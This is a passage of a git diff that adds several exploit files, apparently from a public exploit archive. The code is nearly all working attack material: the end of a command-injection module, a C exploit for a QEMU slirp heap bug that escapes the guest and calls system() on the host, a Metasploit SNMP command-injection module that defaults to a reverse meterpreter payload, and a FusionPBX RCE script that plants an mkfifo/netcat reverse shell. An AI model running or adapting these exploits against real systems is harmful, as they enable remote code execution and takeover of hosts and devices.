+      'cookie' => "redirect=1; testing=1; sid=x; sessiontest=1",
+      'ctype'  => 'application/x-www-form-urlencoded',
+      'uri' => normalize_uri(target_uri.path, 'password_change.cgi'),
+      'headers' =>
+        {
+          'Referer' => "#{peer}/session_login.cgi"
+        },
+      'data' => "user=root&pam=&expired=2&old=AkkuS%7c#{command}%20&new1=akkuss&new2=akkuss"
+      })
+
+  end
+end
\ No newline at end of file
diff --git a/exploits/linux/remote/47320.c b/exploits/linux/remote/47320.c
new file mode 100644
index 000000000..2f7cf41b1
--- /dev/null
+++ b/exploits/linux/remote/47320.c
@@ -0,0 +1,656 @@
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <errno.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <netinet/ip.h>
+#include <net/ethernet.h>
+#include <arpa/inet.h>
+#include <linux/icmp.h>
+#include <linux/if_packet.h>
+#include <sys/ioctl.h>
+#include <net/if.h>
+#include <time.h>
+
+
+#define die(x) do {                             \
+    perror(x);                                  \
+    exit(EXIT_FAILURE);                         \
+  }while(0);
+
+// * * * * * * * * * * * * * * *  Constans * * * * * * * * * * * * * * * * * *
+
+#define SRC_ADDR "10.0.2.15"
+#define DST_ADDR "10.0.2.2"
+
+#define INTERFACE "ens3"
+
+#define ETH_HDRLEN 14         // Ethernet header length
+#define IP4_HDRLEN 20         // IPv4 header length
+#define ICMP_HDRLEN 8         // ICMP header length for echo request, excludes data
+#define MIN_MTU 12000
+
+// * * * * * * * * * * * * * * * QEMU Symbol offset * * * * * * * * * * * * * * * * * *
+
+#define SYSTEM_PLT 0x029b290
+#define QEMU_CLOCK 0x10e8200
+#define QEMU_TIMER_NOTIFY_CB 0x2f4bff
+#define MAIN_LOOP_TLG 0x10e81e0
+#define CPU_UPDATE_STATE 0x488190
+
+// Some place in bss which is not used to craft fake stucts
+#define FAKE_STRUCT 0xf43360
+
+// * * * * * * * * * * * * * * * QEMU Structs * * * * * * * * * * * * * * * * * *
+
+struct mbuf {
+	struct	mbuf *m_next;		/* Linked list of mbufs */
+	struct	mbuf *m_prev;
+	struct	mbuf *m_nextpkt;	/* Next packet in queue/record */
+	struct	mbuf *m_prevpkt;	/* Flags aren't used in the output queue */
+	int	m_flags;		/* Misc flags */
+
+	int	m_size;			/* Size of mbuf, from m_dat or m_ext */
+	struct	socket *m_so;
+
+	char * m_data;			/* Current location of data */
+	int	m_len;			/* Amount of data in this mbuf, from m_data */
+
+	void *slirp;
+	char resolution_requested;
+	u_int64_t expiration_date;
+	char   *m_ext;
+	/* start of dynamic buffer area, must be last element */
+	char  *  m_dat;
+};
+
+
+struct QEMUTimer {
+    int64_t expire_time;        /* in nanoseconds */
+    void *timer_list;
+    void *cb;
+    void *opaque;
+    void *next;
+    int scale;
+};
+
+
+struct QEMUTimerList {
+    void * clock;
+    char active_timers_lock[0x38];
+    struct QEMUTimer *active_timers;
+    struct QEMUTimerList *le_next;   /* next element */                      \
+    struct QEMUTimerList **le_prev;  /* address of previous next element */  \
+    void *notify_cb;
+    void *notify_opaque;
+
+    /* lightweight method to mark the end of timerlist's running */
+    size_t timers_done_ev;
+};
+
+
+
+// * * * * * * * * * * * * * * * Helpers * * * * * * * * * * * * * * * * * *
+
+int raw_socket;
+int recv_socket;
+int spray_id;
+int idx;
+char mac[6];
+
+void * code_leak;
+void * heap_leak;
+
+void *Malloc(size_t size) {
+  void * ptr = calloc(size,1);
+  if (!ptr) {
+    die("malloc() failed to allocate");
+  }
+  return ptr;
+}
+
+unsigned short in_cksum(unsigned short *ptr,int nbytes) {
+
+register long           sum;            /* assumes long == 32 bits */
+    u_short oddbyte;
+    register u_short answer; /* assumes u_short == 16 bits */
+
+    /*
+     * Our algorithm is simple, using a 32-bit accumulator (sum),
+     * we add sequential 16-bit words to it, and at the end, fold back
+     * all the carry bits from the top 16 bits into the lower 16 bits.
+     */
+
+    sum = 0;
+    while (nbytes > 1) {
+      sum += *ptr++;
+      nbytes -= 2;
+}
+
+/* mop up an odd byte, if necessary */
+if (nbytes == 1) {
+oddbyte = 0;            /* make sure top half is zero */
+*((u_char *) &oddbyte) = *(u_char *)ptr;   /* one byte only */
+sum += oddbyte;
+}
+
+/*
+ * Add back carry outs from top 16 bits to low 16 bits.
+ */
+
+sum  = (sum >> 16) + (sum & 0xffff);    /* add high-16 to low-16 */
+sum += (sum >> 16);                     /* add carry */
+answer = ~sum;          /* ones-complement, then truncate to 16 bits */
+return(answer);
+}
+
+void hex_dump(char *desc, void *addr, int len) 
+{
+    int i;
+    unsigned char buff[17];
+    unsigned char *pc = (unsigned char*)addr;
+    if (desc != NULL)
+        printf ("%s:\n", desc);
+    for (i = 0; i < len; i++) {
+        if ((i % 16) == 0) {
+            if (i != 0)
+                printf("  %s\n", buff);
+            printf("  %04x ", i);
+        }
+        printf(" %02x", pc[i]);
+        if ((pc[i] < 0x20) || (pc[i] > 0x7e)) {
+            buff[i % 16] = '.';
+        } else {
+            buff[i % 16] = pc[i];
+        }
+        buff[(i % 16) + 1] = '\0';
+    }
+    while ((i % 16) != 0) {
+        printf("   ");
+        i++;
+    }
+    printf("  %s\n", buff);
+}
+
+char * ethernet_header(char * eth_hdr){
+  
+    /* src MAC :  52:54:00:12:34:56 */
+    memcpy(&eth_hdr[6],mac,6);
+
+    // Next is ethernet type code (ETH_P_IP for IPv4).
+    // http://www.iana.org/assignments/ethernet-numbers
+    eth_hdr[12] = ETH_P_IP / 256;
+    eth_hdr[13] = ETH_P_IP % 256;
+    return eth_hdr;
+}
+
+void ip_header(struct  iphdr * ip ,u_int32_t src_addr,u_int32_t dst_addr,u_int16_t payload_len,
+                         u_int8_t protocol,u_int16_t id,uint16_t frag_off){
+
+  /* rfc791 */
+  ip->ihl = IP4_HDRLEN / sizeof (uint32_t);
+  ip->version = 4;
+  ip->tos = 0x0;
+  ip->tot_len = htons(IP4_HDRLEN + payload_len);
+  ip->id = htons(id);
+  ip->ttl = 64;
+  ip->frag_off = htons(frag_off);
+  ip->protocol = protocol;
+  ip->saddr = src_addr;
+  ip->daddr = dst_addr;
+  ip->check = in_cksum((unsigned short *)ip,IP4_HDRLEN);
+}
+
+void icmp_header(struct icmphdr *icmp, char *data, size_t size) {
+
+  /* rfc792 */
+  icmp->type = ICMP_ECHO;
+  icmp->code = 0;
+  icmp->un.echo.id = htons(0);
+  icmp->un.echo.sequence = htons(0);
+  if (data) {
+    char * payload = (char * )icmp+ ICMP_HDRLEN;
+    memcpy(payload, data, size);
+  }
+
+  icmp->checksum = in_cksum((unsigned short *)icmp, ICMP_HDRLEN + size);
+
+}
+
+void send_pkt(char *frame, u_int32_t frame_length) {
+
+  struct sockaddr_ll sock;
+  sock.sll_family = AF_PACKET;
+  sock.sll_ifindex = idx;
+  sock.sll_halen = 6;
+  memcpy (sock.sll_addr, mac, 6 * sizeof (uint8_t));
+  
+  if(sendto(raw_socket,frame,frame_length,0x0,(struct sockaddr *)&sock,
+            sizeof(sock))<0)
+    die("sendto()");
+}
+
+void send_ip4(uint32_t id,u_int32_t size,char * data,u_int16_t frag_off) {
+
+  u_int32_t src_addr, dst_addr;
+  src_addr = inet_addr(SRC_ADDR);
+  dst_addr = inet_addr(DST_ADDR);
+
+  char * pkt = Malloc(IP_MAXPACKET);
+  struct iphdr * ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
+
+  ethernet_header(pkt);
+  u_int16_t payload_len = size;
+  ip_header(ip,src_addr,dst_addr,payload_len,IPPROTO_ICMP,id,frag_off);
+
+  if(data) {
+    char * payload = (char *)pkt + ETH_HDRLEN + IP4_HDRLEN;
+    memcpy(payload, data, payload_len);
+  }
+  
+  u_int32_t frame_length = ETH_HDRLEN + IP4_HDRLEN + payload_len;
+  send_pkt(pkt,frame_length);
+  free(pkt);
+}
+
+void send_icmp(uint32_t id,u_int32_t size,char * data,u_int16_t frag_off) {
+
+  char * pkt = Malloc(IP_MAXPACKET);
+  struct icmphdr * icmp = (struct icmphdr * )(pkt);
+
+  if(!data)
+      data = Malloc(size);
+  icmp_header(icmp,data,size);
+
+  u_int32_t len =  ICMP_HDRLEN + size;
+  send_ip4(id,len,pkt,frag_off);
+  free(pkt);
+ }
+
+// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *
+
+void initialize() {
+   int sd;
+   struct ifreq ifr;
+   char interface[40];
+   int mtu;
+
+   srand(time(NULL));
+   strcpy (interface, INTERFACE);
+
+  // Submit request for a socket descriptor to look up interface.
+  if ((sd = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
+    die("socket() failed to get socket descriptor for using ioctl()");
+  }
+    // Use ioctl() to get interface maximum transmission unit (MTU).
+  memset (&ifr, 0, sizeof (ifr));
+  strcpy (ifr.ifr_name, interface);
+  if (ioctl (sd, SIOCGIFMTU, &ifr) < 0) {
+    die("ioctl() failed to get MTU ");
+  }
+  mtu = ifr.ifr_mtu;
+  printf ("MTU of interface %s : %i\n", interface, mtu);
+  if (mtu < MIN_MTU) {
+    printf("Run\n$ ip link set dev %s mtu 12000\n",interface);
+    die("");
+  }
+
+  // Use ioctl() to look up interface name and get its MAC address.
+  memset (&ifr, 0, sizeof (ifr));
+  snprintf (ifr.ifr_name, sizeof (ifr.ifr_name), "%s", interface);
+  if (ioctl (sd, SIOCGIFHWADDR, &ifr) < 0) {
+    die("ioctl() failed to get source MAC address ");
+  }
+  memcpy (mac, ifr.ifr_hwaddr.sa_data, 6 * sizeof (uint8_t));
+  printf ("MAC %s :", interface);
+  for (int i=0; i<5; i++) {
+    printf ("%02x:", mac[i]);
+  }
+  printf ("%02x\n", mac[5]);
+
+  // Use ioctl() to look up interface index which we will use to
+  // bind socket descriptor sd to specified interface with setsockopt() since
+  // none of the other arguments of sendto() specify which interface to use.
+  memset (&ifr, 0, sizeof (ifr));
+  snprintf (ifr.ifr_name, sizeof (ifr.ifr_name), "%s", interface);
+  if (ioctl (sd, SIOCGIFINDEX, &ifr) < 0) {
+    die("ioctl() failed to find interface ");
+  }
+
+  close (sd);
+  printf ("Index for interface %s : %i\n", interface, ifr.ifr_ifindex);
+  idx = ifr.ifr_ifindex;
+  
+  if((raw_socket = socket(PF_PACKET, SOCK_RAW, htons (ETH_P_ALL)))==-1)
+      die("socket() failed to obtain raw socket");
+
+
+  /* Bind socket to interface index. */
+  if (setsockopt (raw_socket, SOL_SOCKET, SO_BINDTODEVICE, &ifr, sizeof (ifr)) < 0) {
+    die("setsockopt() failed to bind to interface ");
+  }
+
+  printf("Initialized socket discriptors\n");
+}
+
+
+void spray(uint32_t size, u_int32_t count) {
+  printf("Spraying 0x%x x ICMP[0x%x]\n",count,size);
+   int s;
+   u_int16_t frag_off;
+   char * data;
+
+   for (int i = 0; i < count; i++) {
+     send_icmp(spray_id + i,size, NULL, IP_MF);
+   }
+}
+
+void arbitrary_write(void *addr, size_t addrlen, char *payload, size_t size,
+                     size_t spray_count) {
+  
+    spray(0x8, spray_count);
+
+
+    size_t id = spray_id + spray_count;
+    // Target
+    size_t target_id = id++;
+    send_ip4(target_id, 0x8, NULL, IP_MF);
+
+   
+    // Padding
+    send_ip4(id++, 0x8, NULL, IP_MF);
+    send_ip4(id++, 0x8, NULL, IP_MF);
+
+    // Piviot Point
+    size_t hole_1 = id++;
+    send_ip4(hole_1, 0x8, NULL, IP_MF);
+
+
+    // Padding
+    send_ip4(id++, 0xC30, NULL, IP_MF);
+
+    // For creating hole
+    size_t hole_2 = id++;
+    send_ip4(hole_2, 0x8, NULL, IP_MF);
+
+    // To  prevent consolidation
+    send_ip4(id++, 0x8, NULL, IP_MF);
+
+    // This should create the fist hole
+    send_ip4(hole_1, 0x8, NULL, 0x1);
+
+    // This should create the second hole
+    send_ip4(hole_2, 0x8, NULL, 0x1);
+
+    int m_data_off = -0x70;
+    int m_len = m_data_off;
+    addr = (void *)((size_t)addr + ((m_len * -1) - addrlen));
+    if (addrlen != 0x8) {
+      m_len -= (0x8 - addrlen);
+    }
+
+    size_t vuln_id = id++;
+
+    char * pkt = Malloc(IP_MAXPACKET);
+    memset(pkt,0x0,IP_MAXPACKET);
+    struct iphdr * ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
+    ethernet_header(pkt);
+
+    u_int16_t pkt_len = 0xc90;
+    ip_header(ip,m_len,0x0,pkt_len,IPPROTO_ICMP,vuln_id,IP_MF);
+    u_int32_t frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len;
+
+    // The mbuf of this packet will be placed in the second hole and
+    // m_ext buff will be placed on the first hole, We will write wrt
+    // to this.
+    send_pkt(pkt,frame_length);
+
+    memset(pkt,0x0,IP_MAXPACKET);
+    ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
+    ethernet_header(pkt);
+    pkt_len = 0x8;
+    ip_header(ip,m_len,0x0,pkt_len,IPPROTO_ICMP,vuln_id,0x192);
+    frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len;
+
+    // Trigger the bug to change target's m_len
+    send_pkt(pkt,frame_length);
+
+
+    // Underflow and write, to change m_data
+    char addr_buf[0x8] = {0};
+    if (addrlen != 0x8) {
+      memcpy(&addr_buf[(0x8-addrlen)],(char *)&addr,addrlen);
+    } else {
+      memcpy(addr_buf,(char *)&addr,8);
+    }
+    send_ip4(target_id, 0x8, addr_buf, 0x1|IP_MF);
+    send_ip4(target_id, size, payload, 0x2);
+
+    hex_dump("Writing Payload ", payload, size);
+}
+
+
+void recv_leaks(){
+  /* Prepare recv sd */
+  /* Submit request for a raw socket descriptor to receive packets. */
+  int recvsd, fromlen, bytes, status;
+  struct sockaddr from;
+  char recv_ether_frame[IP_MAXPACKET];
+  struct iphdr *recv_iphdr = (struct iphdr *)(recv_ether_frame + ETH_HDRLEN);
+  struct icmphdr *recv_icmphdr =
+      (struct icmphdr *)(recv_ether_frame + ETH_HDRLEN + IP4_HDRLEN);
+
+  for (;;) {
+
+    memset(recv_ether_frame, 0, IP_MAXPACKET * sizeof(uint8_t));
+    memset(&from, 0, sizeof(from));
+    fromlen = sizeof(from);
+    if ((bytes = recvfrom(recv_socket, recv_ether_frame, IP_MAXPACKET, 0,
+                          (struct sockaddr *)&from, (socklen_t *)&fromlen)) <
+        0) {
+      status = errno;
+      // Deal with error conditions first.
+      if (status == EAGAIN) { // EAGAIN = 11
+        printf("Time out\n");
+      } else if (status == EINTR) { // EINTR = 4
+        continue; // Something weird happened, but let's keep listening.
+      } else {
+        perror("recvfrom() failed ");
+        exit(EXIT_FAILURE);
+      }
+    } // End of error handling conditionals.
+
+    // Check for an IP ethernet frame, carrying ICMP echo reply. If not, ignore
+    // and keep listening.
+    if ((((recv_ether_frame[12] << 8) + recv_ether_frame[13]) == ETH_P_IP) &&
+        (recv_iphdr->protocol == IPPROTO_ICMP) &&
+        (recv_icmphdr->type == ICMP_ECHOREPLY) && (recv_icmphdr->code == 0) &&
+        (recv_icmphdr->checksum == 0xffff)) {
+      hex_dump("Recieved ICMP Replay : ", recv_ether_frame, bytes);
+
+      code_leak = (void *)(*((size_t *)&recv_ether_frame[0x40]) - CPU_UPDATE_STATE);
+      size_t *ptr = (size_t *)(recv_ether_frame + 0x30);
+      for (int i = 0; i < (bytes / 0x8); i++) {
+        if ((ptr[i] & 0x7f0000000000) == 0x7f0000000000) {
+          heap_leak = (void *)(ptr[i] & 0xffffff000000);
+          break;
+        }
+      }
+
+      printf("Host Code Leak : %p\n", code_leak);
+      printf("Host Heap Leak : %p\n", heap_leak);
+      break;
+    }
+  }
+}
+
+void leak() {
+    u_int32_t src_addr, dst_addr;
+    src_addr = inet_addr(SRC_ADDR);
+    dst_addr = inet_addr(DST_ADDR);
+
+    /* Crafting Fake ICMP Packet For Leak */
+    char * pkt = Malloc(IP_MAXPACKET);
+    struct iphdr * ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
+    struct icmphdr * icmp = (struct icmphdr * )(pkt+ETH_HDRLEN+IP4_HDRLEN);
+    ethernet_header(pkt);
+    ip_header(ip,src_addr,dst_addr,ICMP_HDRLEN,IPPROTO_ICMP,0xbabe,IP_MF);
+
+    ip->tot_len = ntohs(ip->tot_len) - IP4_HDRLEN;
+    ip->id = ntohs(ip->id);
+    ip->frag_off = htons(ip->frag_off);
+
+    icmp_header(icmp,NULL,0x0);
+    char * data = (char *)icmp + ICMP_HDRLEN + 8;
+    size_t pkt_len = ETH_HDRLEN + IP4_HDRLEN + ICMP_HDRLEN;
+
+    spray_id = rand() & 0xffff;
+    arbitrary_write((void * )(0xb00-0x20),3,pkt,pkt_len+4,0x100);
+
+    // This is same as the arbitrary write function
+    spray_id = rand() & 0xffff;
+    spray(0x8, 0x20);
+    size_t id = spray_id + 0x20;
+
+    size_t replay_id = id++;
+    send_ip4(replay_id, 0x100, NULL, IP_MF);
+
+    // Target
+    size_t target_id = id++;
+    send_ip4(target_id, 0x8, NULL, IP_MF);
+
+   
+    // Padding
+    send_ip4(id++, 0x8, NULL, IP_MF);
+    send_ip4(id++, 0x8, NULL, IP_MF);
+
+    // Piviot Point
+    size_t hole_1 = id++;
+    send_ip4(hole_1, 0x8, NULL, IP_MF);
+
+
+    // Padding
+    send_ip4(id++, 0xC30, NULL, IP_MF);
+
+    // For creating hole
+    size_t hole_2 = id++;
+    send_ip4(hole_2, 0x8, NULL, IP_MF);
+
+    // Prevent Consolidation
+    send_ip4(id++, 0x8, NULL, IP_MF);
+
+    // This should create the fist hole
+    send_ip4(hole_1, 0x8, NULL, 0x1);
+
+    // This should create the second hole
+    send_ip4(hole_2, 0x8, NULL, 0x1);
+
+    // Trigger the bug to change target's m_len
+    int m_data_off = -0xd50;
+    int m_len = m_data_off;
+    size_t * addr = (size_t * )(0xb00 - 0x20 + ETH_HDRLEN + 0xe +  6) ;
+    size_t addrlen = 0x3;
+
+    if (addrlen != 0x8) {
+      m_len -= (0x8 - addrlen);
+    }
+
+    size_t vuln_id = id++;
+
+    memset(pkt,0x0,IP_MAXPACKET);
+    ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
+    ethernet_header(pkt);
+
+    pkt_len = 0xc90;
+    ip_header(ip,m_len,0x0,pkt_len,IPPROTO_ICMP,vuln_id,IP_MF);
+    u_int32_t frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len;
+    send_pkt(pkt,frame_length);
+
+    
+    memset(pkt,0x0,IP_MAXPACKET);
+    ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
+    ethernet_header(pkt);
+    pkt_len = 0x8;
+    ip_header(ip,m_len,0x0,pkt_len,IPPROTO_ICMP,vuln_id,0x192);
+    frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len;
+    send_pkt(pkt,frame_length);
+
+
+    // Underflow and write to change m_data
+    char addr_buf[0x8] = {0};
+    if (addrlen != 0x8) {
+      memcpy(&addr_buf[(0x8-addrlen)],(char *)&addr,addrlen);
+    } else {
+      memcpy(addr_buf,(char *)&addr,8);
+    }
+    send_ip4(target_id, 0x8, addr_buf, 0x1);
+
+  if ((recv_socket = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0)
+      die("socket() failed to obtain a receive socket descriptor");
+    send_ip4(replay_id, 0x8, NULL, 0x20);
+    recv_leaks();
+
+
+    char zero[0x28] = {0};
+    spray_id = rand() & 0xffff;
+    printf("Cleaning Heap\n");
+    arbitrary_write(heap_leak + (0xb00 - 0x20),3,zero,sizeof(zero),0x20);
+}
+
+
+void pwn() {
+  char payload[0x200] = {0};
+  struct QEMUTimerList *tl = (struct QEMUTimerList *)payload;
+  struct QEMUTimer *ts =
+      (struct QEMUTimer *)(payload + sizeof(struct QEMUTimerList));
+
+  char cmd[] = "/usr/bin/gnome-calculator";
+  memcpy((void *)(payload + sizeof(struct QEMUTimerList )   \
+                             +sizeof(struct QEMUTimer )),  \
+                  (void *)cmd,sizeof(cmd));
+
+  void * fake_timer_list = code_leak +  FAKE_STRUCT;
+  void * fake_timer = fake_timer_list +  sizeof(struct QEMUTimerList);
+
+  void *system = code_leak + SYSTEM_PLT;
+  void *cmd_addr = fake_timer + sizeof(struct QEMUTimer);
+  /* Fake Timer List */
+  tl->clock = (void *)(code_leak + QEMU_CLOCK);
+  *(size_t *)&tl->active_timers_lock[0x30] = 0x0000000100000000;
+  tl->active_timers = fake_timer;
+  tl->le_next = 0x0;
+  tl->le_prev = 0x0;
+  tl->notify_cb = code_leak + QEMU_TIMER_NOTIFY_CB;
+  tl->notify_opaque = 0x0;
+  tl->timers_done_ev = 0x0000000100000000;
+
+  /*Fake Timer structure*/
+  ts->timer_list = fake_timer_list;
+  ts->cb = system;
+  ts->opaque = cmd_addr;
+  ts->scale = 1000000;
+  ts->expire_time = -1;
+
+  spray_id = rand() & 0xffff;
+  size_t payload_size =
+      sizeof(struct QEMUTimerList) + sizeof(struct QEMUTimerList) + sizeof(cmd);
+
+  printf("Writing fake structure : %p\n",fake_timer_list);
+  arbitrary_write(fake_timer_list,8,payload,payload_size,0x20);
+
+  spray_id = rand() & 0xffff;
+  void *  main_loop_tlg = code_leak + MAIN_LOOP_TLG;
+  printf("Overwriting main_loop_tlg %p\n",main_loop_tlg);
+  arbitrary_write(main_loop_tlg,8,(char *)&fake_timer_list,8,0x20);
+}
+
+int main() {
+    initialize();
+    leak();
+    pwn();
+    return 0;
+}
\ No newline at end of file
diff --git a/exploits/linux/remote/47353.rb b/exploits/linux/remote/47353.rb
new file mode 100755
index 000000000..84c1932ac
--- /dev/null
+++ b/exploits/linux/remote/47353.rb
@@ -0,0 +1,181 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::SNMPClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "AwindInc SNMP Service Command Injection",
+      'Description'    => %q{
+        This module exploits a vulnerability found in AwindInc and OEM'ed products where untrusted inputs are fed to ftpfw.sh system command, leading to command injection.
+        A valid SNMP read-write community is required to exploit this vulnerability.
+
+        The following devices are known to be affected by this issue:
+
+          * Crestron Airmedia AM-100 <= version 1.5.0.4
+          * Crestron Airmedia AM-101 <= version 2.5.0.12
+          * Awind WiPG-1600w <= version 2.0.1.8
+          * Awind WiPG-2000d <= version 2.1.6.2
+          * Barco wePresent 2000 <= version 2.1.5.7
+          * Newline Trucast 2 <= version 2.1.0.5
+          * Newline Trucast 3 <= version 2.1.3.7
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Quentin Kaiser <kaiserquentin[at]gmail.com>'
+        ],
+      'References'     =>
+        [
+          ['CVE', '2017-16709'],
+          ['URL', 'https://github.com/QKaiser/awind-research'],
+          ['URL', 'https://qkaiser.github.io/pentesting/2019/03/27/awind-device-vrd/']
+        ],
+      'DisclosureDate' => '2019-03-27',
+      'Platform'       => ['unix', 'linux'],
+      'Arch'           => [ARCH_CMD, ARCH_ARMLE],
+      'Privileged'     => true,
+      'Targets'        => [
+        ['Unix In-Memory',
+          'Platform'    => 'unix',
+          'Arch'        => ARCH_CMD,
+          'Type'        => :unix_memory,
+          'Payload'     => {
+            'Compat'    => {'PayloadType' => 'cmd', 'RequiredCmd' => 'openssl'}
+          }
+        ],
+        ['Linux Dropper',
+          'Platform'    => 'linux',
+          'Arch'        => ARCH_ARMLE,
+          'CmdStagerFlavor' => %w[wget],
+          'Type'        => :linux_dropper
+        ]
+      ],
+      'DefaultTarget'  => 1,
+      'DefaultOptions' => {'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'}))
+
+    register_options(
+      [
+        OptString.new('COMMUNITY', [true, 'SNMP Community String', 'private']),
+      ])
+  end
+
+
+  def check
+    begin
+      connect_snmp
+      sys_description = snmp.get_value('1.3.6.1.2.1.1.1.0').to_s
+      print_status("Target system is #{sys_description}")
+      # AM-100 and AM-101 considered EOL, no fix so no need to check version.
+      model = sys_description.scan(/Crestron Electronics (AM-100|AM-101)/).flatten.first
+      case model
+      when 'AM-100', 'AM-101'
+          return CheckCode::Vulnerable
+      else
+          # TODO: insert description check for other vulnerable models (that I don't have)
+          # In the meantime, we return 'safe'.
+          return CheckCode::Safe
+      end
+    rescue SNMP::RequestTimeout
+      print_error("#{ip} SNMP request timeout.")
+    rescue Rex::ConnectionError
+      print_error("#{ip} Connection refused.")
+    rescue SNMP::UnsupportedVersion
+      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
+    rescue ::Interrupt
+      raise $!
+    rescue ::Exception => e
+      print_error("Unknown error: #{e.class} #{e}")
+    ensure
+      disconnect_snmp
+    end
+    Exploit::CheckCode::Unknown
+  end
+
+  def inject_payload(cmd)
+    begin
+      connect_snmp
+      varbind = SNMP::VarBind.new([1,3,6,1,4,1,3212,100,3,2,9,1,0],SNMP::OctetString.new(cmd))
+      resp = snmp.set(varbind)
+      if resp.error_status == :noError
+        print_status("Injection successful")
+      else
+        print_status("OID not writable or does not provide WRITE access with community '#{datastore['COMMUNITY']}'")
+      end
+    rescue SNMP::RequestTimeout
+      print_error("#{ip} SNMP request timeout.")
+    rescue Rex::ConnectionError
+      print_error("#{ip} Connection refused.")
+    rescue SNMP::UnsupportedVersion
+      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
+    rescue ::Interrupt
+      raise $!
+    rescue ::Exception => e
+      print_error("Unknown error: #{e.class} #{e}")
+    ensure
+      disconnect_snmp
+    end
+  end
+
+  def trigger
+    begin
+      connect_snmp
+      varbind = SNMP::VarBind.new([1,3,6,1,4,1,3212,100,3,2,9,5,0],SNMP::Integer32.new(1))
+      resp = snmp.set(varbind)
+      if resp.error_status == :noError
+        print_status("Trigger successful")
+      else
+        print_status("OID not writable or does not provide WRITE access with community '#{datastore['COMMUNITY']}'")
+      end
+    rescue SNMP::RequestTimeout
+      print_error("#{ip} SNMP request timeout.")
+    rescue Rex::ConnectionError
+      print_error("#{ip} Connection refused.")
+    rescue SNMP::UnsupportedVersion
+      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
+    rescue ::Interrupt
+      raise $!
+    rescue ::Exception => e
+      print_error("Unknown error: #{e.class} #{e}")
+    ensure
+      disconnect_snmp
+    end
+  end
+
+  def exploit
+    case target['Type']
+    when :unix_memory
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager
+    end
+  end
+
+  def execute_command(cmd, opts = {})
+    # The payload must start with a valid FTP URI otherwise the injection point is not reached
+    cmd = "ftp://1.1.1.1/$(#{cmd.to_s})"
+
+    # When the FTP download fails, the script calls /etc/reboot.sh and we loose the callback
+    # We therefore kill /etc/reboot.sh before it reaches /sbin/reboot with that command and
+    # keep our reverse shell opened :)
+    cmd << "$(pkill -f /etc/reboot.sh)"
+
+    # the MIB states that camFWUpgradeFTPURL must be 255 bytes long so we pad
+    cmd << "A" * (255-cmd.length)
+
+    # we inject our payload in camFWUpgradeFTPURL
+    print_status("Injecting payload")
+    inject_payload(cmd)
+
+    # we trigger the firmware download via FTP, which will end up calling this
+    # "/bin/getRemoteURL.sh %s %s %s %d"
+    print_status("Triggering call")
+    trigger
+  end
+end
\ No newline at end of file
diff --git a/exploits/linux/remote/47358.py b/exploits/linux/remote/47358.py
new file mode 100755
index 000000000..86a849630
--- /dev/null
+++ b/exploits/linux/remote/47358.py
@@ -0,0 +1,83 @@
+#!/usr/bin/python3
+
+'''
+# Exploit Title: FusionPBX v4.4.8 Remote Code Execution
+# Date: 13/08/2019
+# Exploit Author: Askar (@mohammadaskar2)
+# CVE : 2019-15029
+# Vendor Homepage: https://www.fusionpbx.com
+# Software link: https://www.fusionpbx.com/download
+# Version: v4.4.8
+# Tested on: Ubuntu 18.04 / PHP 7.2
+'''
+
+import requests
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+import sys
+import warnings
+from bs4 import BeautifulSoup
+
+# turn off BeautifulSoup and requests warnings
+warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+if len(sys.argv) != 6:
+    print(len(sys.argv))
+    print("[~] Usage : ./FusionPBX-exploit.py url username password ip port")
+    print("[~] ./exploit.py http://example.com admin p@$$word 172.0.1.3 1337")
+
+    exit()
+
+url = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+ip = sys.argv[4]
+port = sys.argv[5]
+
+
+request = requests.session()
+
+login_info = {
+    "username": username,
+    "password": password
+}
+
+login_request = request.post(
+    url+"/core/user_settings/user_dashboard.php",
+     login_info, verify=False
+ )
+
+
+if "Invalid Username and/or Password" not in login_request.text:
+    print("[+] Logged in successfully")
+else:
+    print("[+] Error with creds")
+
+service_edit_page = url + "/app/services/service_edit.php"
+services_page = url + "/app/services/services.php"
+payload_info = {
+    # the service name you want to create
+    "service_name":"PwnedService3",
+    "service_type":"pid",
+    "service_data":"1",
+
+    # this value contains the payload , you can change it as you want
+    "service_cmd_start":"rm /tmp/z;mkfifo /tmp/z;cat /tmp/z|/bin/sh -i 2>&1|nc 172.0.1.3 1337 >/tmp/z",
+    "service_cmd_stop":"stop",
+    "service_description":"desc",
+    "submit":"Save"
+}
+
+request.post(service_edit_page, payload_info, verify=False)
+html_page = request.get(services_page, verify=False)
+
+soup = BeautifulSoup(html_page.text, "lxml")
+
+for a in soup.find_all(href=True):
+    if "PwnedService3" in a:
+        sid = a["href"].split("=")[1]
+        break
+
+service_page = url + "/app/services/services.php?id=" + sid + "&a=start"
+print("[+] Triggering the exploit , check your netcat !")
+request.get(service_page, verify=False)
\ No newline at end of file
